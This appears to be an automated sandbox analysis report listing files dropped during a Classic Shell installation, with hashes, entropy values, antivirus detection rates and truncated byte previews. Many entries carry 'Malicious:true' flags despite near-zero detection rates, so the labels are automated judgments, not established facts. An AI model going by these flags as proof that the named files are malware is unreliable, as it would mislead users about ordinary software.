                                        Size (bytes):760632
                                        Entropy (8bit):6.295643740329593
                                        Encrypted:false
                                        SSDEEP:12288:wMpm8zQAic9BZFiiNtmWFD7U0RJrs6aEYaTC7wdX5BYblG9N:rl/wiTP1JRJKEYaTC7wdX52hI
                                        MD5:F239F9186BBF10EF438B0B0C5A71D9A9
                                        SHA1:6B1B562C59121049BF5C15187DE51A507710E5D7
                                        SHA-256:5CD5193B50CEBEFB65DDFA227E2806425B35327D6B545145C6E65A946ED43928
                                        SHA-512:7F63EC4ACE5679C6C2775CFDC7C21F77D0481BF779C78B51D2806551B61AD5E39D18E1786BD9A0DB968AFB2A1279C7543D7067B84B4907A2817D4FFE737F5F94
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 3%
                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........c....a...a...a..z....a..z....a...`.l.a..z...a..z..I.a..z....a..P....a..z....a.Rich..a.................PE..L...\.K[...........!.................@...............................................7....@..........................8..6.......|......................8....p...Z......................................@...............0............................text...Q........................... ..`.rdata...I.......J..................@..@.data........@...`...(..............@....rsrc..............................@..@.reloc..`v...p...x..................@..B................................................................................................................................................................................................................................................................................................................................

                                        C:\Program Files\Classic Shell\ClassicExplorer64.dll

                                        Download File
                                        Process:C:\Windows\System32\rundll32.exe
                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                        Category:dropped
                                        Size (bytes):885560
                                        Entropy (8bit):6.030254768387881
                                        Encrypted:false
                                        SSDEEP:12288:fF6mgUVLctszL5BffCerxb+sNs/qOGiHR5BYblGx:f9hVLctQL5Bnfrxb+sNQ5HR52he
                                        MD5:A7BDF136014CC2BE258CCAC078F437EB
                                        SHA1:EF1108633774F52E406F2A787A2102035DB21858
                                        SHA-256:363809B264B915BD640580F05195A61F308B351555667072239835EC51F4405C
                                        SHA-512:C90637F3D5D6892ABDEF506566B130D6816CE0BA8C9F6506742144B63678B22E80CE7839DCF7B9BCBAE53BD4E8C355781B06A9B64CBBD1B901176B1779FB5B8D
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 3%
                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......70>=sQPnsQPnsQPnz).nxQPnz).nrQPnz).nqQPnz).nVQPnsQQn.PPnz).n&QPnz).n.QPnz).nrQPnm..nrQPnz).nrQPnRichsQPn........................PE..d...F.K[.........." ................d...............................................Hr....@.........................................p... .......|....@.........Hi...v..8.......$...0................................................................................text...B........................... ..`.rdata..............................@..@.data...P...........................@....pdata..Hi.......j...j..............@..@.rsrc.......@......................@..@.reloc..L............b..............@..B................................................................................................................................................................................................................................................

                                        C:\Program Files\Classic Shell\ClassicExplorerSettings.exe

                                        Download File
                                        Process:C:\Windows\System32\rundll32.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):98616
                                        Entropy (8bit):6.05086836225285
                                        Encrypted:false
                                        SSDEEP:1536:HpotLuQVD29umGs9wT4I9H+e3Wvv7dgKwd9ndX3rDw6:4L8v2H+jvv7mX7Dw6
                                        MD5:3DB84D449984C7E980C25DA3F265186D
                                        SHA1:FF99DF916A31393E569ED9CC7C10215811DCFCFC
                                        SHA-256:58B62BA62C53CCED2B8AC6AFAF730E04616F574D63A69E50732F13FA2FDC0F85
                                        SHA-512:3ADEDD69871D772479720557939EDB86AF3A805924567D310BCF73D1F8C36530EB213F63A59A309A4EDAB57C96368819F30E02D304FDF2EFB95F0FCEB1392028
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........5P7.T>d.T>d.T>d.,.d.T>d.,.d.T>d.,.d.T>d.T?d.T>d.,.d.T>d...d.T>d.,.d.T>dRich.T>d................PE..L...].K[..........................................@..................................P....@.............................................(............t..8.......L.......................................@...............h............................text............................... ..`.rdata..L".......$..................@..@.data....+..........................@....rsrc...(...........................@..@.reloc...............d..............@..B........................................................................................................................................................................................................................................................................................................................................

                                        C:\Program Files\Classic Shell\ClassicIEDLL_32.dll

                                        Download File
                                        Process:C:\Windows\System32\rundll32.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):507192
                                        Entropy (8bit):6.331523727596564
                                        Encrypted:false
                                        SSDEEP:6144:jRV3H1qXVdC9lIltuTHkHuwXJpJIOhqr5LEE81954gJbbB1I:jRV3HMVdCTIlUTHkH/XJpS8qr9G5BJbM
                                        MD5:D82C55EF5C9F4DEA2151907D45040B4A
                                        SHA1:605AAAD9C12AB3FD3A44C9B9ADBFD9C75196D565
                                        SHA-256:336F2689D81BC7C2B623C1E1FB67B6D32D4B615DCCE94DC9E37ED9E1BF59EAC7
                                        SHA-512:F8D7BF2397E73DD718B4553F45C2B28CBB44834992DA87832EE71D686C845938B068A2BE34AF4366CCB5894618D89FC5D911D04CD1E0461F7096243D6C94CFE1
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........LK.."..."..."......."......."...#...".......".......".......".......".......".Rich..".........................PE..L...[.K[...........!................+........ ............................... ......c.....@.........................0.......X...h....`...Q..............8........6...&..............................@...@............ ..h............................text...E........................... ..`.rdata....... ......................@..@.data....U.......6..................@....tls.........P......................@....rsrc....Q...`...R..................@..@.reloc..8T.......V...Z..............@..B................................................................................................................................................................................................................................................................................

                                        C:\Program Files\Classic Shell\ClassicIEDLL_64.dll

                                        Download File
                                        Process:C:\Windows\System32\rundll32.exe
                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                        Category:dropped
                                        Size (bytes):292352
                                        Entropy (8bit):6.291424923805442
                                        Encrypted:false
                                        SSDEEP:6144:P+EhZJuiWErKqa2ayOpH6X0v9oh/BBGGUOO:GEdyErYWOpz9o7De
                                        MD5:9534F7D1F6BA24DB066355BBC9B54838
                                        SHA1:10374B028B7052A18D1AE64C5B9962F37D0E79F5
                                        SHA-256:6A7E6DE75E34DC410F50823E92DF4F6C6E45025433D1328B7133BF4CB1010D28
                                        SHA-512:13B5703C02B3C3FFE54AEC7FFC59CB20E7819261F6B3B3F0F5A62A92F0D19127D2892C2E91544FB52BD187882D8DCCC1FCE796A3D28D4BFB3ABAD33E88024D55
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: Virustotal, Detection: 17%, Browse
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........._9.n1j.n1j.n1j..2k.n1j..5k.n1j..4k.n1j..5k.n1j..2k.n1j..4k.n1j..0k.n1j.n0j.n1j..8k.n1j..1k.n1j...j.n1j..3k.n1jRich.n1j........PE..d...2..e.........." ... ............<.....................................................`..........................................1.......2...............p..$'..............h...`...p........................... ...@............................................text...<........................... ..`.rdata...?.......@..................@..@.data....*...@.......,..............@....pdata..$'...p...(...@..............@..@_RDATA..\............h..............@..@.rsrc................j..............@..@.reloc..h............l..............@..B........................................................................................................................................................................................................

                                        C:\Program Files\Classic Shell\ClassicIE_32.exe

                                        Download File
                                        Process:C:\Windows\System32\rundll32.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):104248
                                        Entropy (8bit):6.034633491813912
                                        Encrypted:false
                                        SSDEEP:1536:R/3PSNKe2wmLlIUa22Ud1FRyLoXCsY++3Wvv7dgKwd9nxCNf:R/qTmLKuNLY+Dvv7uCNf
                                        MD5:A1C24588503CD2C1690EF94BBF341829
                                        SHA1:5368795D2A0C0BC404EF2D108A4812979F4544F5
                                        SHA-256:F37F3BD363D1695E0A151C3302FCFB8BE770EB107B066D05F10C4FB6C946318F
                                        SHA-512:7C2E079DD59CD3C905DB6EF1C41356D38E000C9D1FC7E4867BE4B2039BA866871F310C096B29B93D07B71B52B78AC9274FFB77A8257F4A8D7DDF8DD4AF8B4B7F
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......w.H.3|&A3|&A3|&A:..A#|&A:..AZ|&A:..A"|&A3|'AO|&A:..A.|&A-..A2|&A:..A2|&ARich3|&A........................PE..L...^.K[..........................................@.......................................@.................................<........... ...............8...............................................@............................................text............................... ..`.rdata...........0..................@..@.data... ,..........................@....rsrc... ...........................@..@.reloc...............t..............@..B................................................................................................................................................................................................................................................................................................................................

                                        C:\Program Files\Classic Shell\ClassicIE_64.dll

                                        Download File
                                        Process:C:\Windows\System32\rundll32.exe
                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                        Category:dropped
                                        Size (bytes):32435238
                                        Entropy (8bit):1.2710100369600539
                                        Encrypted:false
                                        SSDEEP:49152:407uhAXR+1pD7HB9Ke2It1A8nrpaSwm19ATXykaoQCRb/JTW8kip:z7y1pTKevI9BT9b
                                        MD5:42D43DC42198364FE4543E9265FDD8D5
                                        SHA1:333A60BCA6CE1D7BD4C631D04297BD4EC77618A9
                                        SHA-256:B2B24F67B78FBBA6B605767AC4DDE4CE794D6B279A179A5485A21B7AA6249A11
                                        SHA-512:00508389F85354F6AB501FA29A7FBD492C1A0C161FCD3C1F7EE4DD0E7C29A045A8B1973353A2E3FA7DE7F6AC6ED9C97C03BA89A8A8D7BC1924C2C8E56B31B1E8
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Virustotal, Detection: 18%, Browse
                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d......e.........." ......<..........)<.......@..............................@K...................................... ................C......PC..U...PJ.......F..Y............C.....................................................0fC.(.....C......................text...,.<.......<................. ..`.data....h....=..j....=.............@....bss....H.....B..........................idata...U...PC..V...jB.............@....didata.......C.......B.............@....edata........C.......B.............@..@.rdata..D.....C.......B.............@..@.reloc........C.......B.............@..B.pdata...Y....F..Z....E.............@..@.rsrc........PJ......4I.............@..@.............@K.......J.............@..@........................................

                                        C:\Program Files\Classic Shell\ClassicIE_64.exe

                                        Download File
                                        Process:C:\Windows\System32\rundll32.exe
                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                        Category:dropped
                                        Size (bytes):103736
                                        Entropy (8bit):5.912660682474699
                                        Encrypted:false
                                        SSDEEP:1536:OSz4xjHKQ9M2Q2ejqU0Fe/jPbnKaKlyXdWRpew3Wvv7dgKwd9nxCC:OSz4xjHK12QmPM/jPRXd0pOvv7uCC
                                        MD5:CCCA2C0E6653506652437868D1049817
                                        SHA1:C3B56B86ACE2FA1ADDDE2EC81D0087D31E12CF80
                                        SHA-256:625BB2074498952E01A21C2D54B9B9A4C0841F743E038799B907126980A984BE
                                        SHA-512:CC8E9B84AEAB7044829605BF7329EECCC9C8B595393B037FC5259CABE0D7BBCA07C559C8D2FB67282E482C3F369AB0B9F5236FE9D2E83F8D4110B822E6781F10
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e...!.~.!.~.!.~.(...D.~.(...(.~.(.....~.!...W.~.(.....~.?... .~.(... .~.Rich!.~.........................PE..d...H.K[..........".................p..........@....................................TH....@..........................................................@.. ....0..........8...............................................................0............................text.............................. ..`.rdata..X6.......8..................@..@.data...`6..........................@....pdata.......0......................@..@.rsrc... ....@......................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................

                                        C:\Program Files\Classic Shell\ClassicShell.chm

                                        Download File
                                        Process:C:\Windows\System32\rundll32.exe
                                        File Type:MS Windows HtmlHelp Data
                                        Category:dropped
                                        Size (bytes):1585627
                                        Entropy (8bit):7.995160864775383
                                        Encrypted:true
                                        SSDEEP:49152:1mpETL+Y3zUHQu0u7LPe1Ak9cbPzs/kd8ZsGOh3smmIIEB:1mpEmYAHL0uvPeMLs/edsFY
                                        MD5:251138D2F6A0CA903370941D90E6479B
                                        SHA1:840BAAC95310FEBBC209FEE2F6E375F752117F3E
                                        SHA-256:0CC0453C66731CE5A04FB86C65C1434BA8B0CE58F5D677B2C41E546E35C06BD0
                                        SHA-512:861453B90C30D87949E9C7E23EAC24A2B1CB1732B27AE4DC3FD404A0AB2F9E7706FD3CE4FD045650C70A1D4216610DFAECCC6BC6A4D9EF10CCBF48866F7B3755
                                        Malicious:false
                                        Preview:ITSF....`.................|.{.......".....|.{......."..`...............x.......T........................1..............ITSP....T...........................................j..].!......."..T...............PMGL5................/..../#IDXHDR..}.../#ITBITS..../#STRINGS....P./#SYSTEM..F.../#TOPICS..}.@./#URLSTR....../#URLTBL..=.P./$FIftiMain..../$OBJINST...>.?./$WWAssociativeLinks/..../$WWAssociativeLinks/Property...:../$WWKeywordLinks/..../$WWKeywordLinks/Property...6../ClassicExplorer.html.....:./ClassicIE.html.....J./ClassicShellTOC.hhc...../ClassicStartMenu.html...G..A./images/..../images/after.png...Q..../images/before.png...d..m./images/button_images.png..n.../images/button_settings.png......../images/ClassicShell.png...S.../images/explorer_settings.png...^..L./images/ie9_caption.png.....R./images/ie9_settings.png...I..n./images/ie9_status.png..U.t./images/search1.png......u./images/search2.png..v.. ./images/search3.png.....X./images/settings1.png...E..K./images/settings2.png

                                        C:\Program Files\Classic Shell\ClassicShellReadme.rtf

                                        Download File
                                        Process:C:\Windows\System32\rundll32.exe
                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                        Category:dropped
                                        Size (bytes):96473
                                        Entropy (8bit):5.013468996514304
                                        Encrypted:false
                                        SSDEEP:768:lWr3D3DOCwcwxA1zK48IVT2CsjfjKGwI+X0IjpqsqqqCKAoCk4O6CMqBjLW5qo/e:lWHsy9NOqj/DM
                                        MD5:D00CE44FF320F14EE7B733B3C78AE615
                                        SHA1:625DAA8A5958360EF2A667839C4324B6101CAF7D
                                        SHA-256:95F7362D6F5BD9F2174CA189369CE4D6E25069CDB48670B223399C0523D9D145
                                        SHA-512:1C97F17E61209523B47B7A5E1C72557C8795FB13FB72D5747510AE0134BA986308C1FB6B9DAC9A1D14949C60C6358CEA3B6969886726CDC59D21F0C7F923F0A3
                                        Malicious:false
                                        Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff0\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1033\themelang1033\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}..{\f36\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 0204050305040603

                                        C:\Program Files\Classic Shell\ClassicShellUpdate.exe

                                        Download File
                                        Process:C:\Windows\System32\rundll32.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):402744
                                        Entropy (8bit):6.23649982678044
                                        Encrypted:false
                                        SSDEEP:6144:bdM5fvstilELNbP86TAlLRH8F1954gYbAmNcFK7:bqlgilEpbP86Tq45BYbAK7
                                        MD5:4F0018CC8BA1F9FBA64A873FD526775E
                                        SHA1:B0C6788606318F064D9877E0C9D0459A5C34EB3A
                                        SHA-256:C3209FD73A748A066443CAF1A87D002451D67A33BA33B51BADFC181F25BD5603
                                        SHA-512:732B68C5A64E00B2706EE4B683D74BCA6877F6204D9B6E6B28D87574D3525C997FFDF5D05A9889951291EE42C4C45E00B726B5A1885D4C41380B41D4613A3122
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        • Antivirus: Virustotal, Detection: 1%, Browse
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Y...8...8...8...@#..8...@5..8...@%..8...8...9...@2..8...j"..8...@'..8..Rich.8..................PE..L...R.K[.....................2....................@..........................p............@.................................\s..@.......x7..............8.... .. #.. ...............................PJ..@............................................text...{........................... ..`.rdata..............................@..@.data...|I.......(...t..............@....rsrc...x7.......8..................@..@.reloc...B... ...D..................@..B........................................................................................................................................................................................................................................................................................................................................

                                        C:\Program Files\Classic Shell\ClassicStartMenu.exe

                                        Download File
                                        Process:C:\Windows\System32\rundll32.exe
                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                        Category:dropped
                                        Size (bytes):163640
                                        Entropy (8bit):5.997314411159734
                                        Encrypted:false
                                        SSDEEP:3072:MLKDkNh+eE+AEvQmtMt5dZaFyCO6c7zlXLCHXTpEhfcvv7fFb:kK+vO7ZaFyCOl7IiNcbdb
                                        MD5:6776A3D1C644BFE33932189B00165CAF
                                        SHA1:C109B9B2F344748DAFF26FCC0B55FA0D2CF8322F
                                        SHA-256:A99ADF420EF6498E2E665703FCD1DC76BDBAA5A2E1F38D72F7229A9C3CD932E7
                                        SHA-512:4DB70C69BE312D8065B2013D0A83B235969C7F38B31A8C54C63F8F6C0A888F139DF45EEEB6C245BB7D4DD07F24A18BE9507C4A80DEE2CF4D274F7BC8CBBF8AA9
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............b...b...b.......b......Sb.......b.......b...b...b.......b...0...b.......b..Rich.b..........PE..d...L.K[.........."......6...8......pd.........@.....................................d....@..........................................................0...............r..8............U...............................................P.. ............................text....4.......6.................. ..`.rdata...b...P...d...:..............@..@.data....I.......(..................@....pdata..............................@..@.rsrc........0......................@..@.reloc..^............l..............@..B................................................................................................................................................................................................................................................................................

                                        C:\Program Files\Classic Shell\ClassicStartMenuDLL.dll

                                        Download File
                                        Process:C:\Windows\System32\rundll32.exe
                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                        Category:dropped
                                        Size (bytes):3664696
                                        Entropy (8bit):6.362994861073782
                                        Encrypted:false
                                        SSDEEP:49152:1KLlaN5QY6eVmrOh2yxvV+4cjtnQ7luPEZuzWu204gw+5xDIoFLnnu:fZkmzALRA+0IDnu
                                        MD5:1434E96C86A3B5A9BA9C9A95F1BE1584
                                        SHA1:04C81A71E96940DDDC13A097BEF440343C8D197B
                                        SHA-256:3AD92E7759614D08395EBDEEC411035C7D68CB2FA7532B70FC564546F9DEC4B1
                                        SHA-512:9E9C37047671C5B67180612771D037D332139BA46C6CAC16196E9A863C120D4B45E72A287E6DF41759E04A990F9A77A04C1C841BB89FC6B88C69189A197601D4
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%.<.ahR.ahR.ahR.h...mhR.h....hR.h...bhR.h...chR.h...NhR.ahS.|jR.h....hR.h...`hR..:..`hR.h...`hR.RichahR.........PE..d...I.K[.........." .........($.....<........................................P9.......8...@..........................................u......P=.......0..........0.....7.8.... 9.........................................................0............................text...&........................... ..`.rdata..H...........................@..@.data...X........R...`..............@....pdata..0...........................@..@text....-...........................@.. data....0.... ......................@..@.rsrc........0......................@..@.reloc....... 9..0....7.............@..B................................................................................................................................................................................

                                        C:\Program Files\Classic Shell\ExplorerL10N.ini

                                        Download File
                                        Process:C:\Windows\System32\rundll32.exe
                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):103818
                                        Entropy (8bit):5.8928331157621825
                                        Encrypted:false
                                        SSDEEP:1536:/dlWdvXfn9mkt7wNVOL8gNn6pj5Iq8VIsj203XBnBG:/7NhNOf3j203O
                                        MD5:C89E164A7D30247919FAE38C7512AD24
                                        SHA1:F42BC1CDC66E4822DAE63F0AE2F640E4B217615A
                                        SHA-256:7974A14E02B91A3BCB1E15FCE3AAD7D640D2800989CDD1BA3C5A82F847DE5B98
                                        SHA-512:EAA448EC09EE02BFF711A2101303F80FC608F6D5B9760C3F3C963CC4D36C4F88EB4BDE16573955321F0166A171F4F98D3AE5A8AA805C5D972DE855491DC98031
                                        Malicious:false
                                        Preview:.; This file contains all localized text for Classic Explorer. There is one section per language...; Every section contains text lines in the form of <key> = <string>...; Which section is used depends on the current OS setting. If a key is missing from the language section..; it will be searched in the [default] section. In some cases more than one language can be used...; For example a Japanese system may use English as a secondary language. In that case the search order..; will be [ja-JP] -> [en-US] -> [default]...;..; =============================================================================......[default]..Toolbar.Settings = Classic Explorer Settings......[ar-SA] - Arabic (Saudi Arabia)..Copy.Cancel = ..... .......Copy.More = ...........Copy.CopyHere = .&.. ... ... ........Copy.MoveHere = .&.. ... ... ........Copy.Title = ..... ....... .......Copy.Subtitle = ..... ... ...... ... ... .... '%s

                                        C:\Program Files\Classic Shell\HISTORY.txt

                                        Download File
                                        Process:C:\Windows\System32\rundll32.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):30324
                                        Entropy (8bit):4.099883635478519
                                        Encrypted:false
                                        SSDEEP:768:HU4oBvxuMlxssM5Rw3qR/4D/ZxKvcB7KZefKwaNg:HU4oBJ5qR/W/Zx/B9vaNg
                                        MD5:6B5068DB15113F6DC950330DE7BDD3DC
                                        SHA1:D5C4F6CB4FD5BD3BC64E4816D593841912030D42
                                        SHA-256:AA95EA793F6AB60080982BBE1AA3E9A9EB0E16A85C9DF45CD2F27E738C53E3C6
                                        SHA-512:CAB6AC0F01DCB500B34CB843B984810D5B268717D62B8DEAF2D2DECAD114B1DEDA0DB9E9DBA8A8716E437FEF57D46D64058EEE8A718CA39A07FAF5ABC4FC6A21
                                        Malicious:false
                                        Preview:===============================================================================..== Version 4.3.1 general release (Aug, 2017)..===============================================================================....- Official support for the Creators Update version of Windows 10....- Added a setting to clear icon cache....- Multiple minor improvements and bugfixes....===============================================================================..== Version 4.3.0 general release (Jul, 2016)..===============================================================================....- Official support for the Anniversary Update version of Windows 10....- Fixes for issues found during the 4.2.7 beta....===============================================================================..== Version 4.2.7 beta (May, 2016)..===============================================================================....- Fix for a crash on 32-bit Windows 10 systems....=======================================================

                                        C:\Program Files\Classic Shell\IE Settings.lnk

                                        Download File
                                        Process:C:\Windows\System32\rundll32.exe
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Archive, ctime=Sun Jul 15 15:15:32 2018, mtime=Tue Feb 7 18:51:36 2023, atime=Sun Jul 15 15:15:32 2018, length=104248, window=hide
                                        Category:dropped
                                        Size (bytes):1318
                                        Entropy (8bit):4.456100530133193
                                        Encrypted:false
                                        SSDEEP:24:8LqIiRud/RoEAlKNUkMlpAEJKpyvEMa8WhVkMlcqdKLJaSAhAyvEMa8WWyuf:8LHiRud/cIUkMlqEYpyvvZkkMlcqdEyN
                                        MD5:A93AD8EEEEF5532F9CC99413B6B96793
                                        SHA1:20F0D35E41E0E7B876D5A066004B09E3E131F50D
                                        SHA-256:549B0BC14CF9F3BEF7EB7957EB5DCBA86A9C887B8C951F4CC11C015DF6842559
                                        SHA-512:130E3996606034E3548785B0ED29B2D423F8B27EDFF1FD841B2BE947BB682342950CB86864A97B27257A573EBAF942793FB74EF0258DCBE1FFA74C1542429BB3
                                        Malicious:false
                                        Preview:L..................F.... ....*..W.....4.-;...*..W...8............................P.O. .:i.....+00.../C:\.....................1......T.t..PROGRA~1..t.......C.l.T.t....................J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....d.1.....GVs...CLASSI~1..L......oQb.GVs.............................~.C.l.a.s.s.i.c. .S.h.e.l.l.....n.2.8....L.. .CLASSI~2.EXE..R.......L..GVs......o....T...................C.l.a.s.s.i.c.I.E._.3.2...e.x.e.......^...............-.......]....................C:\Program Files\Classic Shell\ClassicIE_32.exe..C.E.d.i.t. .t.h.e. .s.e.t.t.i.n.g.s. .o.f. .t.h.e. .I.n.t.e.r.n.e.t. .E.x.p.l.o.r.e.r. .t.i.t.l.e. .b.a.r. .a.n.d. .s.t.a.t.u.s. .b.a.r.....\.C.l.a.s.s.i.c.I.E._.3.2...e.x.e...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.C.l.a.s.s.i.c. .S.h.e.l.l.\.........&................c^...NI..e.2.......`.......X.......developer.........;.3L..,.{b..E...&...S..2.jA..;.3L..,.{b..E...&...S..2.jAo...........1SPS.....Oh.....+'..............D...E.d.

                                        C:\Program Files\Classic Shell\PolicyDefinitions.zip

                                        Download File
                                        Process:C:\Windows\System32\rundll32.exe
                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                        Category:dropped
                                        Size (bytes):42014
                                        Entropy (8bit):7.98271695343675
                                        Encrypted:false
                                        SSDEEP:768:7cED9Ol6y+lL4bIPIE7fEUYdxAtitL1QhcnM4O4czzTJ7/TfD:77JOR+lwE/YdxJ1pM4O4kTJ7/n
                                        MD5:9773AD8D846E70082E18343CA42A12A7
                                        SHA1:F279150CAD325F91558921161C6699ACD8312EDC
                                        SHA-256:CB88AE5B29C0413CB7A8C988397B8868329F21BFC70B1A1D0E1B7257316E4DE9
                                        SHA-512:FCE598CC2C8D912AC55939640BE772804D568E05732E52E2A1D23D9BFD2F7253468128534E7EB4F10B9FDF57FA19C9B4D7F768C1EC02DC5679764AAFF3A62F1A
                                        Malicious:false
                                        Preview:PK.........i.L1.....Z.......ClassicExplorer.admx.kO..._.J.;T..y...2+..... .0...PH\.&Mz.....k..\....L,.........8.g.....3....q..:..<......-..h.}..o...@ks....zn..7.....>..Z}..........?.n.....yn=...m/....n.L..Z...0r.{0.:A.....a..F.+..%.|/.......}o.... .Fzw._...p...0/.%.V.....w3d...uV>...P..3..u.^W..._......7'.C.......O...Q.....f......yte..L.r|..W8Y......,.....Zr...o..;K.......m.I......#`_...v........j...W7..'.........X..0X9.&...?...,.T].^.9..L.....I.3...L/D;.L..=.FY.~......n...d...5...-xEo^z...{-....>%^`....B"8...(.|T..!...........!._.uBs....v.{z...7vG.].{.......B...G..A.<.....j.........cV....V.v...|U...J...Xb+Q".gw..@.K.q<.S{6.u.a>.....w3..rGn.[..p.?..F?bR,.4....5.W3=..N..m...uc....[..l}...&..<....f..\.F..."....*. .ea:..{+.+.Oc.bi.9m$.6.P....9...c....C].F......pW.L.W.<......t.}.8vL../.C..#v....F.60E@3.l.\..K.LMM...$...C..F........P.L. ~.U.q.._.>.s.q..tS.tF....iip.F.8....y.d.LY.JT..g...._.....o*.cj.W....W...z.....c...f..+8.[..........:.../.....iH.;.

                                        C:\Program Files\Classic Shell\Skins\Classic Skin.skin

                                        Download File
                                        Process:C:\Windows\System32\rundll32.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):70656
                                        Entropy (8bit):5.579916080865678
                                        Encrypted:false
                                        SSDEEP:768:5cAeLn6Cc1ZoHhuGieMKqKf368f8ivaaGNNiiiZ3QMZ2B6mc5sHv42dN0nKsDEDA:a6CcARZ3RaaGNNiiiZ3Wvv7dgKwd9nL
                                        MD5:AA807C9F20014595E8BFDDF7F6DCA025
                                        SHA1:198BF64B5052E016272C2257A66E05062884CD39
                                        SHA-256:B47661C02468DC823350FCD9E348674E9B7A528127DF7D61B4289FEBA492AE03
                                        SHA-512:125F02C14CB9EB0E929B098B2DB219751A73B5F482FECFBDAD9584491D6AE508A59E6105B015804159024F8EFD686CD5BB1C8676D1FF270A8361252D1B96B9B9
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+...o..o..o..q...n..f...n..Richo..........PE..L...M.K[...........!.........................................................0......6.....@..........................................................................................................................................................rsrc...............................@..@....................................................................8.......P............................................................................... .......8.......P.......h...............................................................................................................................(.......................8.......................H.......................X.......................h.......................x...........................................................................................................

                                        C:\Program Files\Classic Shell\Skins\Classic Skin.skin7

                                        Download File
                                        Process:C:\Windows\System32\rundll32.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):106496
                                        Entropy (8bit):4.710252310302198
                                        Encrypted:false
                                        SSDEEP:768:7LlnHhuGieMKqKf368f8ivaaGNNiiiwmzIimd3QMZ2B6mc5sHv42dN0nKsDEDQdM:9nRZ3RaaGNNiiiwfh3Wvv7dgKwd9nC
                                        MD5:ED0D00E6A9E83242634F6FFEA8A751F1
